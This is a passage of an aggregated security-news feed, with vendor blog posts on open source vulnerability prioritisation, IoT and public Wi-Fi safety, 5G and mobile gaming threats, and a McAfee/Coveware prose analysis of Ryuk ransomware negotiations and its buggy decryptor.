Here’s the catch: there could be a low severity vulnerability that is affecting your code and it could be used to exploit your application.

Is the Vulnerability in the Execution Path?

There’s another dimension that often isn’t taken into account when prioritizing fixes, and that’s whether the vulnerability is actually impacting the code. When it comes to open source risk, for example, we know that it is multi-faceted and complex. Simply having a library with vulnerabilities in it does not mean that your app is at risk – you have to first understand if a vulnerable method is being called. When leveraging an open source library, it’s very common for a developer to only use a small subset of that library for a very particular function or capability. This means that it’s highly likely your application never calls on a vulnerability in the library and, in essence, is not exploitable.

Rather than prioritizing fixing a high-severity vulnerability in a function that is not called by your application, it would be more advantageous to prioritize a medium-severity vulnerability that lies in the execution path and puts your customers at risk. When developers have this information, they are empowered to prioritize and immediately fix vulnerabilities that pose the highest likelihood of exploitation. Additionally, their remediation time is reduced by up to 90 percent. The time saved for your developers, and the decreased time the attack window is open, is crucial to protecting your data.

That being said, just because a vulnerability isn’t in the execution path doesn’t necessarily mean your application isn’t exploitable – it may simply mean we were unable to identify an execution path for the vulnerability. It’s still important to fix all of the vulnerabilities in your application, especially the high and very high ones. Vulnerable method information allows your team to know, out of all of the vulnerabilities detected, which ones have the highest likelihood of exploit.

How Veracode’s Software Composition Analysis Can Help

With many tools out there, developers will receive an extremely large list of vulnerabilities for all open source libraries packaged in your application, and they will have to make a judgment call on what to fix first – and how much is worth fixing before pushing to production. Download the Addressing Your Open Source Risk eBook to learn more about how Veracode’s combination of machine learning and natural language can help you efficiently and effectively manage open source risk.

Quick Heal Threat Report – Cryptojacking rising but Ransomware still #1 threat for consumers

In wake of the growing incidences of targeted cyber-attacks on enterprises using Cryptojacking, due to its ease of deployment and instant return on investments; it rather comes as a surprise that malware authors are still counting on Ransomware for targeting consumers and home users. Yes, you heard it right! According…

What’s the greater risk to UK 5G, Huawei backdoors or DDoS?

Have we been focusing too much on the Huawei backdoor threat instead of the DDoS threat facing the incoming 5G network infrastructure? Lee Chen, CEO at A10 networks thinks so.

The size and sophistication of distributed denial-of-service (DDoS) attacks have risen at an ever-accelerating pace. As new 5G networks become operational, we expect the size of attacks will dwarf these records. This is primarily due to the increase in IoT devices that 5G will introduce, with the number set to reach 4.1 billion globally by 2024. Each device is a perfect nest for botnets carrying malware, offering a new DDoS weapon for hackers to take advantage of.

Service providers will need to evolve rapidly with these growing threats and adopt intelligent automation to detect and mitigate security anomalies in a matter of seconds. Sophisticated DDoS threat intelligence, combined with real-time threat detection and automated signature extraction, will allow the marketplace to defend against even the most massive multi-vector DDoS attacks, no matter where they originate.


The Huawei threat remains a political football, there is still uncertainty on whether the Chinese telecoms giant's network devices will be banned in the UK or not. I have updated my post - Is Huawei a Threat to UK National Security? with the latest developments.

Three Tips to Help You Secure IoT Devices in the Workplace

smart home or officeThe popularity of Internet of Things (IoT) devices is steadily on the rise.  In fact,  IoT Analytics projects that there will be 22 billion active IoT devices by the year 2025. What does this mean for the office, and more specifically, the IT or security team? In short, these teams can expect a growing challenge of securing these devices as they become more commonplace in the office.

It’s no wonder that these devices are becoming a popular fixture in the workplace- they make everyday tasks easier which in turn makes employees happier and more efficient. For example, many offices may implement smart vending machines that communicate when they are getting low on an item and can request a restock from the mothership.  We’re also seeing an increase in smart conferencing setups, TVs, and even smart desks.  Add this to the existing well-known IoT infrastructure devices, such as HVAC and alarm devices, and you’ve got an entire office full of IoT devices.

While these devices can improve the quality of a work environment, they have the opposite effect on the security of this environment.

IoT Vulnerabilities

Oftentimes, these devices will have a camera, microphone, or some other way of recording information. If one of those devices is breached, an attacker can essentially spy on your organization and record loads of valuable and potentially sensitive information.

The biggest concern, though, lies in many of the infrastructure devices mentioned above being poorly configured. When these poorly configured devices are then connected to the same network as the rest of the business, they are creating a backdoor for hackers to easily access your sensitive data.

How to Secure IoT Devices

So how can we ensure that our office, whether it be a home office or a corporate office, isn’t at risk because of an IoT device? While there’s no easy solution, there are steps you can take to secure these devices and reduce the chance of an incident: 

1. Create an IoT device policy for the office.

In this policy, address what devices employees can and cannot bring into the office and whether or not they can connect them to the office network. Include a password strategy in your IoT policy, in which you require all passwords are changed from the default and encourage strong passwords or multi-factor authentication.

It’s also a good idea to include in the policy a way to ensure that any IoT devices in the office are regularly patched and updated.

2. Connect IoT devices to a separate network.

Perhaps the best way to reduce risk from IoT devices in the office is to connect these devices to a separate network. If they are compromised, the damage can be contained within a smaller network rather than the whole company’s network.

If you are unsure of your network configurations or need advice on how to segment these devices onto their own network, consider engaging experts for a Network Security & Architecture Review.  This will reveal any possible vulnerabilities in your network and map out the best way to secure your network.

3. Monitor all IoT device activity.

 Once you decide who, what, where, and how the devices will be connected, it’s a good idea to keep an eye on the devices’ activity. Monitor the devices and how they are interacting with your network, either in-house or through a third party Managed Security Service Provider (MSSP).  This allows you to be proactive if a device has been compromised.

The increase of popularity in IoT devices undoubtedly creates a problem for IT administrators.  But with the tips above, you can still take advantage of the conveniences IoT devices provide without drastically increasing the vulnerability of your organization.

The post Three Tips to Help You Secure IoT Devices in the Workplace appeared first on GRA Quantum.

Ryuk, Exploring the Human Connection

In collaboration with Bill Siegel and Alex Holdtman from Coveware.

 

At the beginning of 2019, McAfee ATR published an article describing how the hasty attribution of Ryuk ransomware to North Korea was missing the point. Since then, collective industry peers discovered additional technical details on Ryuk’s inner workings, the overlap between Ryuk and Hermes2.1, and a detailed description of how the ransomware is piggybacking the infamous and ever evolving Trickbot as a primary attack vector. In this blog post we have teamed up with Coveware to take a closer look at the adversary and victim dynamics of Ryuk Ransomware. We structured our research using the Diamond threat model and challenged our existing hypotheses with fresh insights.

Introduction to The Diamond Model

Within Cyber Threat intelligence research, a popular approach is to model the characteristics of an attack using The Diamond Model of Intrusion Analysis. This model relates four basic elements of an intrusion: adversary, capabilities, infrastructure and victim.

For the Ryuk case described above the model can be applied as follows: “An Adversary, cyber-criminal(s), have a capability (Ryuk Ransomware) that is being spread via a TrickBot infection Infrastructure targeting specific victims.

Diamond model of Intrusion Analysis

The Diamond Model offers a holistic view of an intrusion that is a helpful guideline to shape the direction of intelligence research. By searching for relationships between two elements one can gather new evidence. For instance, by analyzing and reverse engineering a piece of malware one might uncover that a certain server is being used for command and control infrastructure, thus linking capability with infrastructure (as shown below).

Linking Infrastructure and Capability

Alternatively, one might search underground forums to find information on adversaries who sell certain pieces of malware, thus linking an adversary with a capability. For instance, finding the underground forum advertisement of Hermes2.1.

Linking Adversary and Capability

Analysis of Competing Hypotheses

In our earlier publication we explained The Analysis of Competing Hypotheses (ACH), the process of challenging formed hypotheses with research findings.
By following this method, we concluded that the strongest hypothesis is not the one with the most verifying evidence, but the one with the least falsifying evidence.

In order to construct a hypothesis with the least falsifying evidence we welcome research published by our industry peers to dissimilate insights that challenge our hypotheses. When we combined all the evidence with links on the diamond model, we discovered that one essential link wasn’t made, the link between adversary and victim.

Seeking New Insights Between Adversary and Victim

Despite published research, the direct link between adversary and victim remained relatively unexplored. Unlike most cybercrime, ransomware and digital extortion frequently creates a strong social connection between adversary and victim. The adversary has certain needs and views the victim as the means to fulfill those needs. The connection between an adversary and victim often generates valuable insights, especially in cases where (extensive) negotiation take place.

Luckily, one of our NoMoreRansom partners, Coveware, is specialized in ransomware negotiations and has gained valuable insights help us link adversary and victim.

The social connection between Adversary and Victim

Ransom Amounts and Negotiations

By aggregating ransomware negotiation and payment data, Coveware is able to identify strain-specific ransomware trends. With regards to Ryuk, it should be noted that ransom amounts average more than 10x the average, making it the costliest type of ransomware. Coveware also observed that some Ryuk ransoms were highly negotiable, while others were not. The bar-belled negotiation results generated an average ransom payment of $71k, a 60% discount from an average opening ask of $145k.

The bar-belled negotiation outcomes meant that some victims were stonewalled. These victims either lost their data or took on staggering financial risk to pay the ransom. The outcomes also imply that in certain cases the adversary would rather receive infrequent large windfalls (often in excess of 100BTC), while in other cases the adversary was keen to monetize every attack and accept lower amounts to ensure payment. This difference in modus operandi suggests that more than one cyber-criminal group is operating Ryuk ransomware.

Ransom Note and Negotiation Similarities and Differences

Similarities between Bitpaymer and Ryuk ransom notes have been observed before. While it is not uncommon for ransom notes to share similar language, sequences of phrases tend to remain within the same ransomware family. Slight copy+paste modifications are made to the ransom text as a variant is passed along to different groups, but large alterations are rarely made. Below is a comparison of a Bitpaymer initial email (left) and a standard Ryuk initial email (right).

A comparison of a Bitpaymer initial email (left) and a standard Ryuk initial email (right)

The shared language implies that text once unique to a Bitpaymer campaign was borrowed for a Ryuk campaign, possibly by an operator running simultaneous ransom campaigns of both Bitpaymer and Ryuk or the imitation can be considered as the sincerest form of flattery.

Different Initial Email Response May Be Different Adversaries?

A more dramatic scripted communication difference has been observed in the initial email response from Ryuk adversaries. The initial email response is typically identical within ransomware families belonging to the same campaign. When significant differences in length, language, and initial ransom amount appear in the initial email response we are comfortable assuming they belong to unique groups with unique modus operandi. This would mean that Ryuk in being spread by more than one actor group.

Below are two such Ryuk examples:

 

Post Payment Bitcoin Activity

A final indicator that multiple groups are running simultaneous Ryuk campaigns can be observed in the activity of bitcoin after it hits a ransom address. Surprisingly, despite the differences between negotiation outcome and initial communications, Coveware observed little difference between the BTC wallets (blacked out to protect victims) associated with the above cases. Initial comparison showed no meaningful discrepancy in difference between the time of a ransom payment and the time of a corresponding withdraw. Additionally, the distribution of funds upon withdrawal was consistently split between two addresses. Coveware will continue to monitor the funds associated with campaigns for meaningful indicators.

Ryuk Negotiating Profiles

With few exceptions, the rest of the email replies during a Ryuk extortion negotiation are extremely short and blunt. Typical replies and retorts are generally less than 10 written words and often just a single number if the ransom amount is the point of discussion. This correspondence is unique to Ryuk.

One reply did contain quite a remarkable expression; “à la guerre comme à la guerre,” to contextualize the methods and reasons for the cyber criminals’ attacks on western companies. The French expression originates from the seventeenth century and literally translates to “in war as in war” and loosely translates to: “In Harsh times one has to do with what’s available”. The striking thing about this expression is that is prominently featured in volume 30 of the collected works of the Soviet Revolutionary leader Vladimir Lenin. Lenin uses the expression to describe the struggle of his people during the war against western capitalism.

This concept of “The capitalistic West versus the Poor east” is actually something McAfee ATR sees quite often expressed by cyber criminals from some of the Post-Soviet republics. This expression may be a clear indicator of the origin and cultural view of the criminals behind Ryuk.

Ryuk poses existential risk to certain industries

Even though the average ransom discounts of Ryuk are large (~60%), the absolute level of the ransom is extreme. Accordingly, we have seen evidence that links ransom demands to the size of the network footprint of the victim company. However, this doesn’t mean that the ransom demand correlates to the victims actual operational and financial size.

Companies in the IT Hosting and the Freight and Logistics industries have been particularly susceptible to this discrepancy. Coveware has assisted at least 3 companies that have had to unwind their business when an affordable ransom amount, could not be reached. Typically, downtime costs are 10x the ransom amount, but in these industries downtime costs can be particularly extreme.

IT Hosting companies are of note as the size and number of their servers can make them appear like a large organization. Unfortunately, the business of hosting involves high fixed costs, low operating margins, and zero tolerance of downtime by end clients.  Hosting companies that get attacked typically have a few hours to restore service before their clients drop them for alternatives. Moreover, these companies suffer irreparable harm to their reputations, and may trigger SLA breaches that leave them exposed to liability.  The inability to pay a six-figure ransom has caused multiple hosting companies to shut down.

Freight and Logistics firms are also acutely exposed. These firms also present like larger firms given the volume of data they move and their network footprint. Additionally, attacks against Freight and Logistics firms can cause immediate supply chain issues for the victims’ end clients, who are subsequently forced to route through other service providers. Similar to IT Hosting, Freight and Logistics firms have low operating margins and end clients with little tolerance for service interruptions. The inability to pay or negotiate a large ransom has materially impacted several firms in this industry.

Ryuk Decryptor findings and issues

When victims do pay the exorbitant ransom amount, the criminals will provide a decryptor to unlock a their files. This decryptor is actually framework that needs to be loaded with a victim’s private RSA key, provided by the criminals, in order to decrypt. Ensuring that the provided decryptor will only work for this specific victim. This setup allows the criminals to quickly load a victim’s key in the framework and offer a custom decryptor with minimal code change while the underlaying framework remains the same.

From Coveware’s experience we have learned that the decryption process is quite cumbersome and full of possible fatal errors. Luckily Coveware was able to share the Ryuk decryptor with McAfee ATR in order to take a closer look at the issues and level of sophistication of the decryptor.

Once launched the first thing the decryptor does is to search the HKEY_CURRENT_USER Hive for a value pair named “svchos” in the path “SOFTWARE\Microsoft\Windows\CurrentVersion\Run” and delete the specific entry. This removes the persistence of the malware. Afterwards it will reboot the system and remove any remaining Ryuk malware still receding on the system.

Deleting the “svchos” value from the registry.

Once rebooted the user needs to run the tool again and the decryptor will provide two options to decrypt.

  • Decryption per file
  • Automatic decryption

The main interface of the Ryuk decryptor with the different menu options.

HERMES File Marker

During the decryption process we have found that the decryptor searches for the known file marker string HERMES which is located in the encrypted file.

The HERMES marker clearly visible within the file

The fact that Ryuk ransomware adds HERMES filemarker string was already known, but discovering this specific check routine in the decryptor strengthens the hypotheses that Ryuk is a slightly modified version of Hermes2.1 ransomware kit that is sold online even more.

Decryptor Issues

While examining the decryptor we were astonished by the lack of sophistication and the amount of errors that resided within the code. Some of the most prominent issues were:

  • If there is a space in the Windows file path the decryptor will fail the decryption process.
  • If there is a quotation mark (“) in the file path the decryptor will report an error that it cannot find the specific file.
  • The decryptor uses the “GetVersionExW” function to determine the windows version, from Windows 8.1. the value returned by this API has changed and the decryptor isn’t designed to handle this value.
  • The decryptor doesn’t remove the .RYUK extension and replace it with the original extension. So, there is no way the name of the file can give an indication towards the type of the file, something that can be extremely labor intensive for enterprise victims.
  • When choosing the manual option in the decryptor, the user has to supply a path of the specific file or choose “0” to finish. However, choosing a “0” will put the decryptor into an infinite loop.

Looking at the decryptor, it is very worrisome to see that the criminals behind Ryuk can get away with such bad programming. It shows a clear lack of empathy towards their victims and the absence of solid coding skills. Victims who do pay the exorbitant ransom demand are far from in the clear. The decryptor offered by the criminals has a very high risk of malfunctioning, resulting in permanent damage to their precious files. Victims should always make an exact copy of the encrypted hard disk before trying to use the decryptor.

Call to action in piecing the different parts together

By combining all the fresh insights with the information that was already discovered by ourselves and industry peers we can start defining our leading hypotheses around Ryuk. Based on this hypothesis, we will actively look for falsifying evidence. We encourage the security community to participate in this process. We realize that only by collaboration can we piece the different parts of the Ryuk puzzle together.

By now it should be without question that involvement of the DPRK is the least likely hypothesis. Our leading Hypothesis on Ryuk until proven otherwise is;

Ryuk is a direct descendant from Hermes2.1 with slight modifications, based on the code overlap in the ransomware as well as the decryptor. Ryuk is not designed to be used in a largescale corporate environment, based on all the scalability issues in the decryptor. At this moment there are several actors or actor-groups spreading Ryuk, based on the extortion modus operandi and different communications with the victims. The actors or actor-groups behind Ryuk have a relationship with one of the Post-Soviet republics, based on the Russian found in one of the encrypted files and the cultural references observed in the negotiations. The actors behind Ryuk most likely have an affiliation or relationship with the actors behind Trickbot and, based on their TTP, are better skilled at exploitation and lateral movement than pure Ransomware development.

Conclusion

In the last seven months Ryuk has proven to be a highly profitable form of ransomware, despite the poor programming behind it and its decryptor. The criminals have proven to be ruthless and several of their victims were forced to wind down their businesses after they were unable to afford the exorbitant ransom.

When a company does give in to the high demands it is extra painful to see a situation occur where they are permanently unable to recover their files due to the faulty decryptor.

A solid data loss prevention strategy still remains the best advice against all forms of ransomware, for general prevention advice please visit NoMoreRansom. Always seek professional assistance when you are faced with a targeted ransomware attack such as Ryuk.

The post Ryuk, Exploring the Human Connection appeared first on McAfee Blogs.

MWC 2019: The Key to Establishing Digital Trust with Intelligent Connectivity

These days, it’s rare to walk into a home that doesn’t have a smart device in use. From voice assistants, smart TVs, tablets, and more, these devices have greatly enhanced our way of life through intelligent connectivity. Intelligent connectivity is defined by the highly contextualized and personal experiences offered by the smart devices we utilize on a daily basis. However, as manufacturers continue to push out the latest technology to stay ahead of their competitors, device security isn’t always top-of-mind. As a result, the level of confidence consumers have in their devices is reduced. At McAfee, we understand that the notion of digital trust is imperative to the future of security as we adopt technologies shaped by the likes of 5G networks, the Internet of Things (IoT), artificial intelligence (AI), and big data. And as we head into Mobile World Congress 2019 (MWC), one can’t help but wonder, how will these advancements shape the future of mobile connectivity?

Almost every new device is built to connect, and as our 2019 Threats Predictions Report showed us, our dependence on technology is ubiquitous. Take your smartphone, for example. Everywhere you go, this minicomputer allows you to chat with your friends online, send emails, and look up new information with just the press of a button. Only upping the ante, 5G is set to roll out across the nation, bringing greater speed to handheld devices with more data and lower latency. These benefits will set the stage for more IoT devices, such as your smart refrigerator or smart plug, to connect to the network as well. The ability to control the temperature of your refrigerator from your smartphone is a pretty cool capability. But what happens if your smartphone gets hacked and a cybercriminal remotely disables your refrigerator? You may be left with a bigger problem than some spoiled food.

With all of your smart devices on the same 5G network, malicious actors can gain full access to the data that lives in your smart home technology through just your mobile phone. The increase in devices on the 5G network also increases the risk of Distributed Denial-of-service, or DDoS, attacks. These attacks are caused by cybercriminals flooding a network with so much traffic that it can’t operate or communicate as it normally would. And with more IoT devices operating on the 5G network, the consequences of such a cyberattack could be truly crippling. So, how can we continue to trust the devices we use on a daily basis despite the cybersecurity risks caused by greater connectivity?

Digital trust, or the level of confidence consumers have in their technology and mobile devices, is extremely delicate. And as our experiences with our devices become more and more personalized thanks to intelligent connectivity, it’s important to realize that it can’t be intelligent if there is no trust. That’s why consumers should embrace advancements in mobile technology but remember to keep cybersecurity practices at the forefront.

Whether you’re headed out to Barcelona for MWC 2019 or watching from afar, we here at McAfee are committed to helping you take the necessary precautions required in order to connect with confidence in a world where everything is built to connect.

Stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post MWC 2019: The Key to Establishing Digital Trust with Intelligent Connectivity appeared first on McAfee Blogs.

Veracode included in new Forrester Now Tech: Software Composition Analysis, Q1 2019

software vulnerabilities

Vulnerable components in software lurk everywhere. At the same time, business competitiveness hinges on the speed and quality of software delivery. So, how does an enterprise not only keep up with application security, but also thrive despite the threats posed by risks in their software?

A software composition analysis (SCA) solution can help organizations identify known vulnerabilities from open source components used by their applications, and alert businesses when new vulnerabilities are discovered after an application has been scanned or when existing known vulnerabilities have had their severity level upgraded.

Companies using SCA gain benefits beyond more secure code as well – they can reduce unplanned work, lower risk exposure across the business, and achieve regulatory compliance.

A new report from Forrester Research, Now Tech: Software Composition Analysis, Q1 2019, details the importance of improving open source security with SCA and guides security professionals with descriptions and key takeaways about what to expect from an SCA vendor to provide the best value to their organizations.

It lists Veracode among the largest providers based on annual revenue.

The Now Tech: Software Composition Analysis, Q1 2019 report states:

According to global security decision makers, the top two business priorities for their firms are to grow revenue and improve the experience of customers (41% and 38% of respondents, respectively, said this is a high or critical priority). Accelerating the use of open source components can help achieve both priorities by letting developers focus on creating new and unique features rather than recreating basic functionality. It’s long past time for security pros to realize the benefits of open source components and embrace its use in development.

Every business needs to understand the pervasive nature of vulnerabilities in the software that is powering advancements in every industry. Veracode’s State of Software Security Report Vol. 9 found that more than 85 percent of all applications have at least one vulnerability in them. The report, based on 700,000 scans performed over 12 months, also found 87.5 percent of Java apps contain at least one vulnerable component, and the pass rate for the OWASP Top 10 most critical web application security risks on initial scan declined for the third year in a row.

Click here to read the full Forrester Now Tech: Software Composition Analysis, Q1 2019 report, and find out more about Veracode’s SCA capabilities.

Mobile World Congress 2019: Q&A with McAfee Leadership

Next week, Mobile World Congress (MWC) will kick off in Barcelona. This year’s event will have an estimated 107,000 attendees, along with 2,400 exhibitors, all representing about 205 countries. While the focus of the event is mobility, we can expect the industry to continue to drive conversations around IoT, artificial intelligence, 5G, connectivity, and more.

As Europe’s biggest gathering in the IT sector nears, we spoke with McAfee leadership about the major themes we should expect to see at MWC this year and what it means for McAfee.

Q: Artificial intelligence and the new 5G standard have been the hot topics of mobility. Do you think these two topics will play an important role at this year’s Mobile World Congress?

Gary Davis, Chief Consumer Security Evangelist: Absolutely. With 5G starting to be rolled out, everyone is waiting on bated breath to see how that affects society and our ecosystems in general. With technologies like 5G enabling almost zero latency, more data will be collected and aggregated. Insights from that mass of data can only be gleaned by using AI-based solutions.

Radhika Sarang, Director of Global Consumer Product Marketing: 5G and AI should be hot topics of discussion at MWC 2019. I fully expect several products and services displaying both technologies on the show floor. 5G will be transformative in how we consume content, adopt new technologies, and connect with one another. However, this phenomenon will increase the need for redefining the concept of digital trust. Narrow or weak AI has grown leaps and bounds recently in areas of natural language processing, machine learning, and advanced analytics. These technologies are also enabling cybersecurity teams to foresee cyberattacks and create proactive solutions.

Q: This year’s theme for Mobile World Congress is Intelligent Connectivity. What does this term mean to McAfee? What does it mean for enterprise businesses?

Davis: For McAfee, we would interpret that to mean that for something to be intelligent, trust must be established. Without trust, intelligent connectivity fails to exist.

Nathan Jenniges, Senior Director of the Device Security Business: It means having access to information when and how you need it. Increasingly the “how” is through mobile devices. The “when” is not defined by traditional business hours, as people engage at all times of the day. They also use the same device for enterprise business as they do for personal business, which increases the level of risk to an organization. Inherent in intelligent connectivity is security. You can connect at any time. But to connect intelligently, you need to be confident the connection is secure and not increasing your risk. As an example, you could connect your mission critical equipment to any electrical outlet. But if you connected intelligently, you’d have some sort of surge protector, so you don’t destroy your mission critical equipment. The surge protector is equivalent to protecting mobile devices from attack when they are connected to organizational resources.

Q: At any industry event, we can expect to see announcements for new technologies and IoT devices. What can you tell us about new security challenges that may arise this year and beyond?

Davis: Most everything being built today is engineered to be connected. However, most manufacturers are solving for time to market and convenience, thus forgoing any meaningful security controls. This results in the rapid expansion of the attack surface, which bad actors will most definitely target.

Sarang: Security threat vectors are shifting and evolving alongside the growth of IoT among consumers, enterprises, and network providers. Hackers are always looking to find creative ways to monetize in this increasingly connected world. With predictions of over 50 devices in each household by 2020, we fully expect to see more DDoS attacks and IoT-based ransomware. And with the advent of 5G that promises to transform our digital lives, it’s imperative that security is addressed as a top priority by service providers to create consumer digital trust in an even more connected world.

Q: How will mobile impact the enterprise in 2019?

Jenniges: Mobile threats continue to increase at record-breaking levels with more and more vulnerabilities discovered every month. In alignment with the threat, more business work is being done on mobile than ever before as mobile devices quickly become the dominant endpoint device. These devices access the same information and contain the same information that a traditional endpoint does with zero protection. As an attacker, you will look for the most efficient attack path and mobile is clearly the new favorite path.

 

We’ll be making a splash at this year’s conference, so be sure to stop by booth #5A21 in Expo Hall 5, where we will host demos, giveaways, and more. Also, be sure to follow @McAfee and @McAfee_Home for real-time updates from the show and opportunities to win giveaways throughout the week.

The post Mobile World Congress 2019: Q&A with McAfee Leadership appeared first on McAfee Blogs.

When snazzy apps fail at providing real-time information; gate agents (actual humans!) prevail

I was recently traveling, and I downloaded the airlines’ app to use on the road.  It did prove to be initially beneficial when checking in and selecting my seat.  However, I’d like to suggest that the app prompts to opt-in to push notifications, instead of leaving it as a toggle within the app.  When navigating […]

The post When snazzy apps fail at providing real-time information; gate agents (actual humans!) prevail appeared first on Privacy Ref Blog.

MWC 2019: Why 5G + Fortnite = a win-win for criminals

So apparently, the company behind Fortnite has so much cash that it’s forming a $100 million prize fund for upcoming competitions. It’s hardly surprising since its creators, Epic Games, confirmed that by the end of November 2018, 200 million players had registered accounts across PCs, gaming consoles and on mobile. The Android app alone was downloaded 15 million times within the first three weeks of its release.

Staggeringly though, this remains a ‘free’ game and while the freemium model is hardly new in the world of mobile apps – just consider the returns Supercell got with Clash of Clans – it does provide an opportunity for criminals to also get their share. Unsurprisingly the promise of achieving an advantage is particularly attractive since top gamers can earn hundreds of thousands of dollars.

Combined with alternative delivery methods such as the use of an invitation-only beta version of Fortnite distributed in August 2018, we saw the growth in promises of invitations, and over-eager YouTubers with links to apps that were not what they appeared. From an InfoSec perspective this is hardly surprising, but the reality is that we are dealing with an audience demonstrating no due diligence in their pursuit of access to the latest games.

While Fortnite is undoubtedly a phenomenon, it’s just the tip of the iceberg. There are already challengers nipping at its heels. PUBG Mobile, for example, is played by 30 million people daily, while there are plans for EA’s Apex Legends to move over to mobile, having acquired 10 million online players in its first 72 hours.

The growing appetite for mobile gaming will only increase further this year with the arrival of 5G networks and its promise of super-fast speeds and ultra-low latency. And of course, as the number of mobile gamers continues to grow, so too will the opportunity for criminals to exploit them.

75 percent of gamers claimed security was the element that most concerned them about the future of gaming. Such concerns are hardly surprising since we found almost two thirds of gamers have or know someone who has been directly affected by a cyberattack, with the average gamer experiencing around five attacks. However, the likelihood is that these concerns are put to one side when a link to a third-party app store offers a beta version to the latest gaming phenomenon.

Analysts suggest that 2018 was a tipping point for mobile gaming, when cost, convenience and a social element saw the channel become bigger than console and PC gaming combined. Unfortunately, this means opportunistic criminals now have their eyes on a huge and growing number of potential victims.

Join us at this year’s Mobile World Congress in Barcelona, where we’ll be demoing McAfee Gamer Security, and revealing how criminals are cashing in on Fortnite and its unorthodox distribution method.

The post MWC 2019: Why 5G + Fortnite = a win-win for criminals appeared first on McAfee Blogs.

The Risks of Public Wi-Fi and How to Close the Security Gap

public wi-fi risksAs I write this blog post, I’m digitally exposed, and I know it. For the past week, I’ve had to log on to a hospital’s public Wi-Fi each day to work while a loved one recuperates.

What seems like a routine, casual connection to the hospital’s Wi-Fi isn’t. Using public Wi-Fi is a daily choice loaded with risk. Sure, I’m conducting business and knocking out my to-do list like a rock star but at what cost to my security?

The Risks

By using public Wi-Fi, I’ve opened my online activity and personal data (via my laptop) up to a variety of threats including eavesdropping, malware distribution, and bitcoin mining. There’s even a chance I could have logged on to a malicious hotspot that looked like the hospital network.

Like many public Wi-Fi spots, the hospital’s network could lack encryption, which is a security measure that scrambles the information sent from my computer to the hospital’s router so other people can’t read it. Minus encryption, whatever I send over the hospital’s network could potentially be intercepted and used maliciously by cybercriminals.

Because logging on to public Wi-Fi is often a necessity — like my situation this week — security isn’t always the first thing on our minds. But over the past year, a new normal is emerging. A lot of us are thinking twice. With data breaches, privacy concerns, the increase in the market for stolen credentials, and increasingly sophisticated online scams making the headlines every day, the risks of using public Wi-Fi are front and center.

Rising Star: VPNpublic wi-fi risks

The solution to risky public Wi-Fi? A Virtual Private Network (VPN). A VPN allows users to securely access a private network and share data remotely through public networks. Much like a firewall protects the data on your computer, a VPN protects your online activity by encrypting your data when you connect to the internet from a remote or public location. A VPN also conceals your location, IP address, and online activity.

Using a VPN helps protect you from potential hackers using public Wi-Fi, which is one of their favorite easy-to-access security loopholes.

Who Needs a VPN?

If you (or your family members) travel and love to shop online, access your bank account, watch movies, and do everyday business via your phone or laptop, a VPN would allow you to connect safely and encrypt your data no matter where you are.

A VPN can mask, or scramble, your physical location, banking account credentials, and credit card information.

Also, if you have a family data plan you’ve likely encouraged your kids to save data by connecting to public Wi-Fi whenever possible. Using a VPN, this habit would be secured from criminal sniffers and snoopers.

A VPN allows you to connect to a proxy server that will access online sites on your behalf and enables a secure connection most anywhere you go. A VPN also allows hides your IP address and allows you to browse anonymously from any location.

How VPNs work

To use a VPN you subscribe to VPN service, download the app onto your desktop or phone, set up your account, and then log onto a VPN server to conduct your online activity privately.

If you are still logging on to public Wi-Fi, here are a few tips to keep you safe until VPNs become as popular as Wi-Fi.

Stay Safe on Public Wi-Fi 

Verify your connection. Fake networks that mine your data abound. If you are logging on to Wi-Fi in a coffee shop, hotel, airport, or library, verify the exact name of the network with an employee. Also, only use Wi-Fi that requires a password to log on.public wi-fi risks

Don’t get distracted. For adults, as well as kids, it’s easy to get distracted and absorbed with our screens — this is risky when on public Wi-Fi, according to Diana Graber, author of Raising Humans in a Digital World. “Knowing how to guard their personal information online is one of the most important skills parents need to equip their young kids with today,” says Graber. “Lots of young people visit public spaces, like a local coffee shop or library, and use public Wi-Fi to do homework, for example. It’s not uncommon for them to get distracted by something else online or even tempted to buy something, without realizing their personal information (or yours!) might be at risk.”

Disable auto Wi-Fi connect. If your phone automatically joins surrounding networks, you can disable this function in your settings. Avoid linking to unknown or unrecognized networks.

Turn off Wi-Fi when done. Your computer or phone can still transmit data even when you are not using it. Be sure to disable your Wi-Fi from the network when you are finished using it.

Avoid financial transactions. If you must use public Wi-Fi, don’t conduct a sensitive transaction such as banking, shopping, or any kind of activity that requires your social security or credit card numbers or password use. Wait until you get to a secured home network to conduct personal business.

Look for the HTTPS. Fake or unsecured websites will not have the HTTPS in their address. Also, look for the little lock icon in the address bar to confirm a secure connection.

Secure your devices. Use a personal VPN as an extra layer of security against hackers and malware.

The post The Risks of Public Wi-Fi and How to Close the Security Gap appeared first on McAfee Blogs.

Weekly Update 126

Weekly Update 126

Another week, another conference. This time it was Microsoft Ignite in Sydney and as tends to happen at these events, many casual meetups, chats, beers, selfies, delivery of HIBP stickers and an all-round good time, albeit an exhausting one. That's why I'm a day late this week having finally arrived home late last night.

Moving on though, I've got a bunch of other events coming up particularly in conjunctions with the folks at NDC. Brisbane in a couple of weeks, Gold Coast in April then Minnesota in May. Oh - plus Oslo in June and stretching out beyond that, Sydney in October. The link in the references below about how conferences can help keep speakers happy (or piss them off, as it may be), explains why I keep doing these events. All that plus more data breach news and my thoughts on the subsequent lists of credential stuffing data.

Weekly Update 126
Weekly Update 126
Weekly Update 126

References

  1. I'm doing a free user group in Brisbane for NDC on Thursday 28 Feb (this will be a really casual presentation, Q&A and fun night out)
  2. Speaking of NDC, the show will be on in my home town of the Gold Coast in late April (that's a dedicated security event which Scott Helme will be down for too)
  3. Speaking of NDC, I'll also be at NDC Minnesota in May (Hack Yourself First workshop and a shiny keynote)
  4. The reason I keep doing NDC events is because they don't do any of these things! (that's the 10 things conferences do to upset their speakers)
  5. A heap of new data was leaked earlier on in the week (EyeEm has since been loaded into HIBP)
  6. And then even more data breaches were announced a couple of days ago (I'll obviously be keeping an eye out for those too)
  7. All these new data breaches are already starting to make the debate around credential stuffing collections a memory (but as I explain in that post, I think we're past hyping every single one of them up)

The 11 biggest issues IT faces today

Each year we talk with tech leaders about the biggest problems they’ll face in the near future, and we’re starting to see some subtle and not-so-subtle shifts from the worries of 2018.

Data overload, a major concern 12 months ago, has evolved as new data-hungry tools and AI help make sense of data and drive business decisions. This year CIOs say they’re more concerned with how to protect that data, as organizations grapple with new privacy regulations.

